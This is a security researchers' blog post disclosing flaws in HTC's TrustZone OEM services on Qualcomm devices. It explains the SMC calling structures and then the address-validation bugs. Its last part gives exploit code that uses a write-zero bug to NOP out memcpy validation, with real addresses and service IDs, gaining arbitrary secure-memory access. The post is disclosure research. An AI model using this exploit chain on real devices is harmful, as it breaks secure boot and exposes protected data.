Thursday, August 14

Here Be Dragons: Vulnerabilities in TrustZone

In June we presented on vulnerabilities in the Qualcomm & HTC implementations of TrustZone at REcon 2014. We have been patiently waiting to drop the research to those interested, and now that Vegas is behind us, we can finally do so.

Why the wait? Well, after REcon, we noted that Dan Rosenberg was presenting on TrustZone research at Black Hat USA, and out of respect for Dan's work, Atredis decided to sit on this blog post until after his talk. Overlaps and similar research happen all the time, and since Black Hat was fairly close at the time, we thought it best to let Dan have the mic. Dan's stuff is great - you should check out his slides and white paper; he dropped a good bug with similar impact, and his work covers some TZ components not discussed here.

[What is TrustZone?]

The ARM specification of TrustZone Technology has been heavily promoted as the "be all, end all" solution for mobile security. Through extensive marketing promises of easy BYOD, secure PIN entry, and protection against APT (not to mention the ubiquity of ARM chips soldered into mobile devices), TrustZone has become the de facto standard for claiming and providing a "secure processing environment" in cellular handsets.

While a secure processing environment sounds like an awesome thing to have as an end user, the realistic drivers for the massive TrustZone adoption are not owner empowerment but the more mundane use case of Digital Rights Management (DRM). The secure enclave of TrustZone is primarily used to facilitate vendor locks and DRM processing, rather than to make user data harder to compromise. Further, due to TZ architecture, the inclusion of DRM protections provides a net reduction in the real-world security provided to the device owner.

Soap box and ramblings aside, Google is your friend if you want more specification data from ARM or if you want high level details from Qualcomm's fortress of shallow marketing materials (trademark pending)... but enough already, let's talk details.

You can watch our REcon presentation here, but unfortunately the first 10-15 minutes were cut off. We're using this blog post to document the vulnerabilities reported to HTC and shed some further light on TrustZone.

[Funny aside: after finding HTC's PGP key on their site and emailing them, they got back to us a month later saying they couldn't open it, and to please send in the clear. We obliged, and they've told us it's fixed, but we are unable to validate until a new firmware revision makes it through a carrier and into the real world.]


TZ consumes untrusted input from a number of places:
  • SMC [Secure Monitor Call] interface (has had the most public research)
  • Interrupts
  • Shared Memory
  • Peripherals
We primarily focused on the SMC interface for this round of TZ research. Additionally, we built a fuzzer for TZ that resulted in a metric ton of crashes, but for architectural reasons, we still think the best route for TZ vuln discovery (on the SMC interface) is static reversing.


The SMC interface is invoked by executing the ARM SMC instruction from supervisor mode, meaning you need to be in the kernel. You invoke the instruction with a pointer to a physical memory location that contains the structures below. The code snippets below are taken from arch/arm/mach-msm/scm.c in an Android kernel.
/*
 * An SCM command is laid out in memory as follows:
 *
 *      ------------------- <--- struct scm_command
 *      | command header  |
 *      -------------------
 *      | command buffer  |
 *      ------------------- <--- struct scm_response
 *      | response header |
 *      -------------------
 *      | response buffer |
 *      -------------------
 */

The scm_command struct contains its total length, offset to its request buffer, offset to its response buffer header (which in turn contains another offset to its own buffer), and the buffers themselves:
struct scm_command {
        u32     len;
        u32     buf_offset;
        u32     resp_hdr_offset;
        u32     id;
        u32     buf[0];
};

The resp_hdr_offset entry points to:
struct scm_response {
        u32     len;
        u32     buf_offset;
        u32     is_complete;
};
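To make the offsets concrete, here is a minimal userspace sketch of the layout, not the kernel's own allocation code. The helper names scm_layout_alloc and scm_layout_response are ours, and the sketch assumes the request length is a multiple of 4 so the response header stays word aligned.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Same field layout as the kernel structs, using fixed-width userspace types. */
struct scm_command {
    uint32_t len;             /* total size: both headers plus both buffers */
    uint32_t buf_offset;      /* command buffer, measured from the start of this struct */
    uint32_t resp_hdr_offset; /* response header, measured from the start of this struct */
    uint32_t id;
    uint32_t buf[];
};

struct scm_response {
    uint32_t len;
    uint32_t buf_offset;      /* response buffer, measured from the response header */
    uint32_t is_complete;
};

/* Hypothetical helper: allocate one zeroed block holding all four regions.
 * Assumes req_len is a multiple of 4 and that the sizes do not overflow. */
struct scm_command *scm_layout_alloc(uint32_t id, const void *req,
                                     uint32_t req_len, uint32_t resp_len)
{
    uint32_t total = (uint32_t)(sizeof(struct scm_command) + req_len +
                                sizeof(struct scm_response) + resp_len);
    struct scm_command *cmd = calloc(1, total);

    if (!cmd)
        return NULL;
    cmd->len = total;
    cmd->buf_offset = (uint32_t)offsetof(struct scm_command, buf);
    cmd->resp_hdr_offset = cmd->buf_offset + req_len;
    cmd->id = id;
    if (req && req_len)
        memcpy((uint8_t *)cmd + cmd->buf_offset, req, req_len);
    return cmd;
}

/* Hypothetical helper: follow resp_hdr_offset to the response header. */
struct scm_response *scm_layout_response(struct scm_command *cmd)
{
    return (struct scm_response *)((uint8_t *)cmd + cmd->resp_hdr_offset);
}
```

With an 8-byte request and a 4-byte response, the block is 40 bytes long, the command buffer starts at offset 16, and the response header starts at offset 24.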

Lastly, the example kernel driver code that utilizes these buffers:
static u32 smc(u32 cmd_addr)
{
        int context_id;
        register u32 r0 asm("r0") = 1;
        register u32 r1 asm("r1") = (u32)&context_id;
        register u32 r2 asm("r2") = cmd_addr;
        do {
                asm volatile(
                        __asmeq("%0", "r0")
                        __asmeq("%1", "r0")
                        __asmeq("%2", "r1")
                        __asmeq("%3", "r2")
#ifdef REQUIRES_SEC
                        ".arch_extension sec\n"
#endif
                        "smc    #0      @ switch to secure world\n"
                        : "=r" (r0)
                        : "r" (r0), "r" (r1), "r" (r2)
                        : "r3");
        } while (r0 == SCM_INTERRUPTED);

        return r0;
}

When smc is called, the command buffer will contain a struct made up of the ID of the TZ service being called and an arbitrary number of variables needed for that function.

As one example, scm_set_boot_addr in scm-boot.c invokes SMC like so:
int scm_set_boot_addr(phys_addr_t addr, unsigned int flags)
{
        struct {
                unsigned int flags;
                unsigned long addr;
        } cmd;

        cmd.addr  = addr;
        cmd.flags = flags;
        return scm_call(SCM_SVC_BOOT, SCM_BOOT_ADDR,
                        &cmd, sizeof(cmd), NULL, 0);
}

[Aside: SCM is not a typo. Qualcomm actually chose SCM, "Secure Channel Manager", as a wrapper for SMC. The scm_call function simply spins up the correct kernel buffers and converts virtual addresses to their phys counterparts.]
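One detail the excerpts above do not show is how the service and command numbers passed to scm_call end up in the single id field. Our reading of the scm.c of this era is that they are packed as (service << 10) | command. Treat that as an assumption if your kernel tree differs. The helper names below are ours. The packing is at least consistent with the IDs that appear later in this post: 0x801 and 0x805 decode to service 2, commands 1 and 5, and 0x3f814 decodes to service 0xfe, command 0x14.

```c
#include <stdint.h>

/* Assumption: id = (service << 10) | command, as in the scm.c of this era. */
uint32_t scm_pack_id(uint32_t svc_id, uint32_t cmd_id)
{
    return (svc_id << 10) | cmd_id;
}

/* Upper bits: which service family is being addressed. */
uint32_t scm_id_service(uint32_t id)
{
    return id >> 10;
}

/* Low 10 bits: which command within that service. */
uint32_t scm_id_command(uint32_t id)
{
    return id & 0x3ff;
}
```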

OK, so we know how SMC works, what can we actually talk to?

[TrustZone Services] 

Inside TZ, there is a table labeling all the services, command IDs, location of the function implementing a given service, return types, and the number and size of arguments. It looks like this:
ROM:2A02E054                 DCD 0x801               ; Service ID
ROM:2A02E058                 DCD aTzbsp_pil_init     ; "tzbsp_pil_init_image_ns"
ROM:2A02E05C                 DCD 0x1D                ; Return type
ROM:2A02E060                 DCD tzbsp_pil_init_image_ns+1
ROM:2A02E064                 DCD 2                   ; Number of arguments
ROM:2A02E068                 DCD 4                   ; Size of arg1
ROM:2A02E06C                 DCD 4                   ; Size of arg2
ROM:2A02E070                 DCD 0x805
ROM:2A02E074                 DCD aTzbsp_pil_auth     ; "tzbsp_pil_auth_reset_ns"
ROM:2A02E078                 DCD 0x1D
ROM:2A02E07C                 DCD tzbsp_pil_auth_reset_ns+1
ROM:2A02E080                 DCD 1
ROM:2A02E084                 DCD 4

... And so on.

From here, we can enumerate all available services, know what to expect them to return, as well as know how many arguments to send and what size they are.
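A minimal sketch of walking that table once you have dumped it as an array of 32-bit words. The record shape (ID, name pointer, return type, function pointer, argument count, then one size per argument) is inferred from the listing above. The struct and function names are ours, and the cap on arguments is arbitrary.

```c
#include <stddef.h>
#include <stdint.h>

#define SVC_MAX_ARGS 16  /* arbitrary cap for this sketch */

struct svc_entry {
    uint32_t id;
    uint32_t name_ptr;   /* address of the service name string */
    uint32_t ret_type;
    uint32_t func_ptr;   /* low bit set marks a Thumb entry point (the "+1" above) */
    uint32_t nargs;
    uint32_t arg_size[SVC_MAX_ARGS];
};

/* Parse up to `max` variable-length records out of `nwords` 32-bit words.
 * Returns the number of records parsed; stops early on a malformed record. */
size_t svc_table_walk(const uint32_t *w, size_t nwords,
                      struct svc_entry *out, size_t max)
{
    size_t pos = 0, count = 0;

    while (count < max && nwords - pos >= 5) {
        uint32_t nargs = w[pos + 4];
        struct svc_entry *e;

        if (nargs > SVC_MAX_ARGS || nwords - pos - 5 < nargs)
            break;
        e = &out[count++];
        e->id = w[pos];
        e->name_ptr = w[pos + 1];
        e->ret_type = w[pos + 2];
        e->func_ptr = w[pos + 3];
        e->nargs = nargs;
        for (uint32_t i = 0; i < nargs; i++)
            e->arg_size[i] = w[pos + 5 + i];
        pos += 5 + nargs;
    }
    return count;
}
```

The real table presumably has an end marker or a known length. The sketch leaves that to the caller via nwords rather than guessing at it.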

[Pointer: this table is really useful for figuring out the base of the firmware image when you extract it from a device or a firmware file. The string pointer for service 0x801 should always point to "tzbsp_pil_init_image_ns", giving you the offset values you need to calculate its base.]
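The arithmetic behind that trick is simply base = (string pointer stored in the table) - (file offset where the string actually sits). A minimal sketch follows, assuming the image is one flat blob loaded contiguously and that you have already read the name pointer out of the 0x801 entry. The function name tz_guess_base is ours.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Find the service 0x801 name string in a raw image and derive the load base.
 * Returns 0 and stores the base on success, -1 if the string is not found
 * or the result would be negative. */
int tz_guess_base(const uint8_t *img, size_t img_len,
                  uint32_t name_ptr, uint32_t *base)
{
    static const char needle[] = "tzbsp_pil_init_image_ns";
    size_t n = sizeof(needle);   /* include the NUL so longer names do not match */

    for (size_t off = 0; off + n <= img_len; off++) {
        if (memcmp(img + off, needle, n) == 0) {
            if (off > name_ptr)
                return -1;
            *base = name_ptr - (uint32_t)off;
            return 0;
        }
    }
    return -1;
}
```

If the string sits at file offset 0x40 and the table says it lives at 0x2A000040, the image base is 0x2A000000.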

Looking at the full listing, most are part of the Qualcomm core functionality available on all supported devices, but OEMs have the option of extending it with their own services. HTC extended theirs considerably, so let's focus on them:

Look at those primitives! _write_mem, _read_mem, _memcpy?!

Ah, so here's where we learn a new valuable lesson about TZ service security: Everyone does their own thing. To summarize it:
  • Each function individually validates input on invocation.
  • HTC utilizes an access bitmask representing each of their tzbsp_oem functions, with a check at the top of every function determining if the service is disabled or not. (See [is_svc_enabled] below. This is how HTC disables those fantastical exploit primitives listed above.)
  • Qualcomm does not universally block access to any of their functions. If they're present, it's assumed they're needed, and while input is validated, the function itself is accessible to the kernel.
  • Qualcomm's input validation uses a check against several protected memory regions, bailing out if you touch any of them.
  • Some OEMs perform their own validation of input against their specific address ranges, rather than using QC's list. Their addresses are, umm, less complete.
  • Some platforms copy QC's model, performing the same validation. 
One thing I'll point out about this model is that every function has to get the validation right on its own. Guess how consistent that is across all of the given players?

[Randomness: You may notice the tzbsp_oem_do_something function. We've seen that function in numerous vendor implementations, and we can only suspect it is sample code that QC provides to OEMs who just leave it in their production code. If you are curious what that function does, however, you will usually find it merely returns 0. Yes, the aptly named tzbsp_oem_do_something inevitably does nothing.]

[Enter HTC]

One short piece of information before we dive into the bugs.


This is the bitmask I was referencing above that HTC added to their OEM functions. The bitmask starts off as 0xFFFFFFFF in flash, and during boot, dangerous functions are turned off once they are not needed. This is perhaps a fragile model, but it does allow the temporary usage of TZ services that can later be disabled after they are no longer needed.
signed int __fastcall is_svc_enabled(unsigned __int8 svc_id)
{
  return g_disable_bitmask & (1 << svc_id);
}

[Note: TZ does quite a bit of validation, to varying degrees of success, on addresses passed in to ensure writes to secure memory don't occur. Because of this, if you pass in the address of a kernel variable to detect a write vulnerability, it won't tell you anything, because it is not a secure address. So how can you detect write vulnerabilities without reversing them? Well, you can pass in the address of g_disable_bitmask and then try to invoke all OEM functions as a poor man's read primitive. If your write succeeded, you will see that different functions are now enabled/disabled.]
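A minimal sketch of that probing trick: snapshot which OEM services answer before and after a suspected write, then diff the two masks. Everything here is illustrative. The probe callback is hypothetical, and sim_probe is a stand-in that simulates a device so the sketch runs on a desktop. The -4 is the "service disabled" return value seen in the pseudocode later in this post.

```c
#include <stdint.h>

#define OEM_SVC_COUNT    32
#define OEM_ERR_DISABLED (-4)  /* returned by the OEM handlers when a service is off */

/* Hypothetical callback: invoke OEM service `svc` with harmless arguments. */
typedef int (*oem_probe_fn)(unsigned svc);

/* Build a bitmask of services that did NOT report "disabled". */
uint32_t oem_enabled_snapshot(oem_probe_fn probe)
{
    uint32_t mask = 0;

    for (unsigned svc = 0; svc < OEM_SVC_COUNT; svc++)
        if (probe(svc) != OEM_ERR_DISABLED)
            mask |= UINT32_C(1) << svc;
    return mask;
}

/* Bits that changed between two snapshots; non-zero means the write landed. */
uint32_t oem_enabled_diff(uint32_t before, uint32_t after)
{
    return before ^ after;
}

/* Simulation only: pretend this is the device's bitmask and service gate. */
uint32_t sim_bitmask;

int sim_probe(unsigned svc)
{
    return ((sim_bitmask >> svc) & 1) ? 0 : OEM_ERR_DISABLED;
}
```

On real hardware the probe would wrap an actual SMC call per service, and you would pick arguments that fail validation harmlessly once past the enabled check.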

[tzbsp_oem_access_item, address validation]

#define IS_TZ_MEMORY(x) ((x) >= 0x2A000000 && (x) < 0x2B000000)

int tzbsp_oem_access_item(int write_flag, int item_id, void * addr, int len) {
  if (!is_svc_enabled(26)) {
    return -4;
  }

  // rejected only if an endpoint is in TZ memory AND the start is below 0x2A03F000
  if ((IS_TZ_MEMORY(addr) || IS_TZ_MEMORY(addr + len - 1)) && addr < 0x2A03F000) {
    return -1;
  }

  if (!write_flag) {
    if (item_id == 37) {
      if (g_flag > 0) {
        memcpy(addr, g_item_37, len);
      }
    }
  }
  // ... (remainder of function not shown)
}

HTC uses similar bounds checking in a few places. This check tries to verify if the start and stop addresses are in between 0x2A000000 and 0x2A03F000. There are multiple problems with this:
  • It's only checking against one range, where QC's code checks against 12.
  • What happens if the length value is really big? (Answer: it overflows and wraps around under 0x2A03F000, bypassing this check, but it's ugly and influences a lot more than is ideal.)
  • This address range is supposed to be the TZ code and data itself, but someone forgot to update the ceiling, because the TZ code extends past 0x2A03F000 due to large amounts of DRM code.
In any event, that one is a pain to exploit, and there are others, so let's move on.
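To see the first two problems in isolation, here is a minimal sketch that models the check with 32-bit arithmetic and compares it against an overlap test that cannot wrap. The function names are ours. The safer variant still only knows about the single 0x2A000000-0x2B000000 range used by the macro above, so it is an illustration of the arithmetic, not a complete fix.

```c
#include <stdbool.h>
#include <stdint.h>

#define TZ_LO      UINT32_C(0x2A000000)
#define TZ_HI      UINT32_C(0x2B000000)
#define TZ_CEILING UINT32_C(0x2A03F000)

static bool in_tz(uint32_t x)
{
    return x >= TZ_LO && x < TZ_HI;
}

/* The check as it reads in the pseudocode above; true means "rejected". */
bool htc_style_rejects(uint32_t addr, uint32_t len)
{
    uint32_t last = addr + len - 1;       /* wraps modulo 2^32 */

    return (in_tz(addr) || in_tz(last)) && addr < TZ_CEILING;
}

/* Overflow-safe alternative: reject any overlap with [TZ_LO, TZ_HI). */
bool overlap_rejects(uint32_t addr, uint32_t len)
{
    uint64_t end = (uint64_t)addr + len;  /* one past the last byte, cannot wrap */

    if (end > (UINT64_C(1) << 32))
        return true;                      /* range runs off the address space */
    return len != 0 && addr < TZ_HI && end > TZ_LO;
}
```

Three inputs slip past the original check: a start at or above 0x2A03F000, a range that begins below TZ memory and ends above it, and a length large enough to wrap the end address.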

[tzbsp_oem_discretix, memory write]

int __tzbsp_oem_discretix(struct_p * s, size_t len) {
  if (len != 0x14) {
    return -16;
  }
  s->status = g_fs_status; // *(int *)(s + 16) = g_fs_status
  // ... (remainder of function not shown)
}

Hey, not everyone validates their input! And check that out, an overwrite of s->status (s + 16) with whatever is stored at 0x2A02BC80 (g_fs_status).

We later determined this value was zero in every case we cared about, so we can call it a write zero primitive. Under the hood, it is using the ARM STR instruction, so it has to be 4-byte aligned, but is otherwise very flexible.
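Since the store lands at s + 16, zeroing an arbitrary word means passing a struct pointer 0x10 bytes below the target, with the length the function insists on (0x14). The sketch below simulates that against a local buffer so the arithmetic can be checked off-device. sim_mem, sim_discretix and sim_write_zero are stand-ins of ours, and the bounds check exists only to keep the simulation safe.

```c
#include <stdint.h>
#include <string.h>

#define SIM_BASE UINT32_C(0x2A000000)

uint8_t sim_mem[0x100];               /* stand-in for memory starting at SIM_BASE */
const uint32_t sim_fs_status = 0;     /* the value observed to be zero in practice */

/* Simulated handler with the same shape as the pseudocode above. */
int sim_discretix(uint32_t s, uint32_t len)
{
    uint32_t field;

    if (len != 0x14)
        return -16;
    field = s + 16;                   /* address of s->status */
    if (field < SIM_BASE || field - SIM_BASE > sizeof(sim_mem) - 4)
        return -1;                    /* simulation-only bounds check */
    memcpy(&sim_mem[field - SIM_BASE], &sim_fs_status, 4);
    return 0;
}

/* Zero the 32-bit word at `target` by aiming s->status at it. */
int sim_write_zero(uint32_t target)
{
    return sim_discretix(target - 0x10, 0x14);
}
```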

[tzbsp_oem_memcpy, why do you exist?]

#define IS_TZ_MEMORY(x) ((x) >= 0x2A000000 && (x) < 0x2B000000)
#define CONTAINS_TZ_MEMORY(x, len) ((x) < 0x2A000000 && ((x) + (len)) >= 0x2B000000)

signed int tzbsp_oem_memcpy(void * dst, void * src, uint32_t len)
{
  uintptr_t dst_end   = dst + len - 1;
  uint32_t copying_to_tz   = CONTAINS_TZ_MEMORY(dst, len) || IS_TZ_MEMORY(dst);
  uint32_t copying_from_tz = CONTAINS_TZ_MEMORY(src, len) || IS_TZ_MEMORY(src);

  if ( !is_svc_enabled(20) ) {
    return -4;
  }
  if (copying_to_tz && copying_from_tz) {
    return -1;
  }
  if (copying_to_tz && dst < 0x2A03F000) {
    return -1;
  }

  // extra validation, only applied when this flag is set
  if ( dword_2A02BAC8 > 1u ) {
    if (dst < 0x88AF0000 && dst_end >= 0x88AF1140) {
      return -16;
    }
    if ((dst_end + 0x77510000) < 0x1140 || (dst + 0x77510000) < 0x1140) {
      return -16;
    }
    if (src != 0x88AF0000) {
      return -2;
    }
    if (len != 0x1140) {
      return -17;
    }
  }
  memcpy(dst, src, len);
  invalidate_data_cache(dst, len);
  return 0;
}
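The additions of 0x77510000 in that pseudocode look odd until you notice that 0x77510000 is 2^32 - 0x88AF0000. Adding it is the compiler's way of subtracting the window base, so each comparison is an unsigned "is this address inside the 0x1140-byte window at 0x88AF0000" test. A minimal sketch of the equivalence, with names of our own choosing:

```c
#include <stdbool.h>
#include <stdint.h>

#define WIN_BASE UINT32_C(0x88AF0000)
#define WIN_SIZE UINT32_C(0x1140)

/* The form seen in the decompiler output: add the two's complement of the base. */
bool in_window_compiled(uint32_t x)
{
    return (uint32_t)(x + UINT32_C(0x77510000)) < WIN_SIZE;
}

/* The readable equivalent. */
bool in_window_plain(uint32_t x)
{
    return x >= WIN_BASE && x < WIN_BASE + WIN_SIZE;
}
```

Both functions agree for every 32-bit input, because an address below the base wraps to a huge unsigned value and fails the less-than test.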

In this pseudocode, we can see some address validation (heh, no comment), checking a flag to perform further validation, etc. At the very end, we have:

  memcpy(dst, src, len);
  invalidate_data_cache(dst, len);
  return 0;

So if we can get there, we have a fully controlled memcpy(). But how can we do that?

00 00                        MOV r0, r0         ; nop in thumb mode
00 00 00 00                  ANDEQ r0, r0, r0   ; nop in arm

Writing zeros over code produces a NOP equivalent in both ARM and Thumb mode. And surely that code isn't mapped RWX, is it? Well, apparently so.
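To see why an all-zero word is harmless in ARM mode, it helps to pull apart the fields of a data-processing instruction. The sketch below is a bare-bones decoder of our own, covering only the register form. For 0x00000000 every field is zero: condition EQ, opcode AND, and r0 for all three registers, with the flag-setting bit clear. Even when the condition holds, r0 AND r0 written back to r0 changes nothing.

```c
#include <stdint.h>

/* Fields of an ARM data-processing instruction (register operand form). */
struct arm_dp_fields {
    unsigned cond;    /* bits 31:28, 0x0 = EQ, 0xE = AL */
    unsigned opcode;  /* bits 24:21, 0x0 = AND, 0x4 = ADD */
    unsigned s;       /* bit 20, set if the instruction updates flags */
    unsigned rn;      /* bits 19:16, first operand register */
    unsigned rd;      /* bits 15:12, destination register */
    unsigned rm;      /* bits 3:0, second operand register */
};

struct arm_dp_fields arm_dp_decode(uint32_t insn)
{
    struct arm_dp_fields f;

    f.cond = insn >> 28;
    f.opcode = (insn >> 21) & 0xf;
    f.s = (insn >> 20) & 1;
    f.rn = (insn >> 16) & 0xf;
    f.rd = (insn >> 12) & 0xf;
    f.rm = insn & 0xf;
    return f;
}
```

For contrast, 0xE0812003 (ADD r2, r1, r3) decodes to condition 0xE, opcode 4, rn 1, rd 2, rm 3.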

ROM:2A003278                 PUSH            {R3-R7,LR}
ROM:2A00327A                 MOV             R4, R0
ROM:2A00327C                 MOV             R3, R1
ROM:2A00327E                 MOV             R5, R2

// validation, nop'd out

ROM:2A0033EC                 MOV             R1, R3
ROM:2A0033EE                 MOV             R0, R4
ROM:2A0033F0                 BLX             memcpy
ROM:2A0033F4                 MOV             R1, R5
ROM:2A0033F6                 MOV             R0, R4
ROM:2A0033F8                 BLX             invalidate_data_cache
ROM:2A0033FC                 MOVS            R0, #0
ROM:2A0033FE                 POP             {R3-R7,PC}
ROM:2A0033FE ; End of function tzbsp_oem_memcpy

Using the write zero primitive on the address range from 0x2A003280 to 0x2A0033E8 nops out all validation, allowing you to memcpy in and out of secure memory as desired.

This memcpy can be used to export all data out of secure memory, copy in your own shellcode, overwrite QC's knowledge of where secure and insecure code resides, and anything else you need. Boom!

The exploit code is shown below, utilizing this memcpy to overwrite the g_disable_bitmask bitmask with 0xFFFFFFFF to turn on all services. For simplicity, the call_svc function is not included, but it is merely a wrapper around an SMC call that sets up the scm_command structure. It takes in the SCM function identifier, the argument count, and then that number of arguments.

  #define TZ_MEMCPY_NOP_START (0x2A003280)
  #define TZ_MEMCPY_NOP_STOP  (0x2A0033E8)
  #define TZ_HTC_DISABLE_BITS (0x2A02BAC4)

  #define TZ_HTC_OEM_MEMCPY_ID (0x3f814)
  #define WRITE_ZERO(x) call_svc(0x3f81b, 3, 0x0, (x) - 0x10, 0x14)

  // allocate our version of g_disable_bitmask and set to 0xffffffff (all enabled)
  int * val = kzalloc(4, GFP_KERNEL);
  val[0] = 0xffffffff;

  // NOP out all validation in tzbsp_oem_memcpy
  for (i = TZ_MEMCPY_NOP_START ; i <= TZ_MEMCPY_NOP_STOP ; i+=4) {
    if ((i % 4) != 0) {
      printk("[-] [0x%x] INVALID NOP...MUST BE 4 BYTE ALIGNED!\n", i);
      break;
    }
    // zero one 32-bit word of the validation code
    WRITE_ZERO(i);
  }

  // use memcpy to enable all the other functions (unnecessary but fun)
  call_svc(TZ_HTC_OEM_MEMCPY_ID, 3, TZ_HTC_DISABLE_BITS, virt_to_phys(val), 4);
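For readers who want a starting point for call_svc, here is a minimal sketch of the argument-marshalling half only. It is not our actual wrapper. The names call_svc_sketch, svc_request and svc_transport are hypothetical, and the transport is a stub that records the request so the sketch runs in userspace. On a device, the transport would copy the arguments into an scm_command buffer and issue the SMC.

```c
#include <stdarg.h>
#include <stdint.h>

#define CALL_MAX_ARGS 8   /* arbitrary cap for this sketch */

struct svc_request {
    uint32_t id;
    uint32_t argc;
    uint32_t argv[CALL_MAX_ARGS];
};

/* Hypothetical transport hook; a real one would build the scm_command and SMC. */
typedef int (*svc_transport_fn)(const struct svc_request *req);

struct svc_request last_request;          /* filled in by the stub below */

int stub_transport(const struct svc_request *req)
{
    last_request = *req;
    return 0;
}

svc_transport_fn svc_transport = stub_transport;

/* Pack `argc` 32-bit arguments and hand them to the transport.
 * Every variadic argument must be a 32-bit integer. */
int call_svc_sketch(uint32_t id, int argc, ...)
{
    struct svc_request req = { .id = id };
    va_list ap;

    if (argc < 0 || argc > CALL_MAX_ARGS)
        return -1;
    req.argc = (uint32_t)argc;
    va_start(ap, argc);
    for (int i = 0; i < argc; i++)
        req.argv[i] = va_arg(ap, uint32_t);
    va_end(ap);
    return svc_transport(&req);
}
```

Keeping the transport behind a function pointer lets the same marshalling code be exercised off-device before it ever touches an SMC.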


[So What?]

We've shown a pathway for gaining arbitrary code execution within TrustZone, but, in fairness to Qualcomm, this specific exploit is limited to HTC devices and caused by code HTC added. However, it's a great exemplar of how just one terrible, obvious write-zero vulnerability can lead to the complete compromise of TrustZone. And because TrustZone's architecture passes physical buffers back and forth, this class of write vulnerability is the most common and simplest vulnerability you're going to find. So to summarize, write vulns pop up like mushrooms from this fertile ground, and write vulns can really ruin your day.

To put it another way, why does a mistake in discretix (dealing with DRM functionality) have the ability to nuke secure boot? This seems like a dangerous idea, and is what we meant when we started this all off with the claim that the inclusion of bad, complex code provides a net reduction in real world security for the user. And we're ragging on DRM code here because that's where the vulnerability we discussed was found, but TZ does not allow for the inclusion of imperfect code, anywhere. And imperfect code abounds.

Given the financial drivers, we don't expect a lot of this to change, but we're hopeful we'll one day see a trend towards protecting the user from malware over protecting media companies from users.

In conclusion, we have given a peek behind the trusted veil to show you a piece of how everything works, as well as a few pointers along the way to get you started on your own research.

Hope you enjoyed our travels. Talk to you again soon. 

Go forth and 0day,
n & c